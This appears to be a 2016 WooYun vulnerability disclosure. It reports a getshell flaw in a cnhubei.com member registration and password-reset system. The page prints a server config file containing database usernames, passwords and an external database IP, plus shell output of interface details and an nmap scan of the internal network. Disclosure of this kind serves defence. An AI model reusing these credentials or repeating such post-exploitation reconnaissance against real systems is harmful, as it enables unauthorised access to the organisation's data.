当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166853

漏洞标题:荆楚网某业务系统Getshell漏洞

相关厂商:荆楚网

漏洞作者: 艺术家

提交时间:2016-01-03 11:02

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-03: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

既然基本所有站都安了安全狗

详细说明:

漏洞证明:

漏洞点:
http://show.cnhubei.com/admin/registerMember.do
http://show.cnhubei.com/admin/forgetpwdMember.do

1.jpg

2.jpg

3.jpg


/root/showcnhubei/tomcat-show/webapps/ROOT/WEB-INF/classes/config.properties

jdbc.driverClassName=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/showv2?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8
jdbc.username=root
jdbc.password=rootroot
hibernate.dialect=org.hibernate.dialect.MySQL5InnoDBDialect
cpk.jdbc.driverClassName=com.microsoft.sqlserver.jdbc.SQLServerDriver
cpk.jdbc.url=jdbc:sqlserver://221.235.53.87:1433;databaseName=cpk;integratedSecurity=false;
cpk.jdbc.url_padd=jdbc:sqlserver://221.235.53.87:1433;databaseName=productAdd;integratedSecurity=false;
cpk.jdbc.username=sa
cpk.jdbc.password=kaiyitech
cpk.hibernate.dialect=org.hibernate.dialect.SQLServerDialect
system.pagesize=10
system.title=\ufeff\u795e\u7801\u2122\u4e8c\u7ef4\u7801\u4fe1\u606f\u81ea\u53d1\u5e03\u5e73\u53f0
system.customCode=whis
system.simplekey=key1tech


直接在内网:
[/root/showcnhubei/tomcat-show/webapps/ROOT/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:D9:6A:71
inet addr:192.168.99.240 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed9:6a71/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:11464485 errors:0 dropped:0 overruns:0 frame:0
TX packets:177138974453 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7250694794 (6.7 GiB) TX bytes:175426349404955 (159.5 TiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2101937 errors:0 dropped:0 overruns:0 frame:0
TX packets:2101937 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1823577246 (1.6 GiB) TX bytes:1823577246 (1.6 GiB)
简单看一下,不深入了,感觉不会有什么太多东西。
[/root/showcnhubei/tomcat-show/webapps/ROOT/]$ nmap -Pn 192.168.99.1/24 -p 80 -oN /tmp/xx.txt
Starting Nmap 5.51 ( http://nmap.org ) at 2016-01-02 15:53 CST
Nmap scan report for pfSense.localdomain (192.168.99.1)
Host is up (0.00035s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:72:D4:DC (VMware)
Nmap scan report for 192.168.99.85
Host is up (0.00040s latency).
PORT STATE SERVICE
80/tcp closed http
MAC Address: 00:0C:29:9A:60:78 (VMware)
Nmap scan report for productserver (192.168.99.240)
Host is up (0.000063s latency).
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 192.168.99.241
Host is up (0.00059s latency).
PORT STATE SERVICE
80/tcp closed http
MAC Address: 00:0C:29:56:63:58 (VMware)
Nmap scan report for 192.168.99.254
Host is up (0.00053s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:50:56:60:1B:2E (VMware)
Nmap done: 256 IP addresses (5 hosts up) scanned in 15.46 seconds

修复方案:

把漏洞补了。

版权声明:转载请注明来源 艺术家@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-05 09:45

厂商回复:

感谢您的反馈,已通知研发修补漏洞。

最新状态:

暂无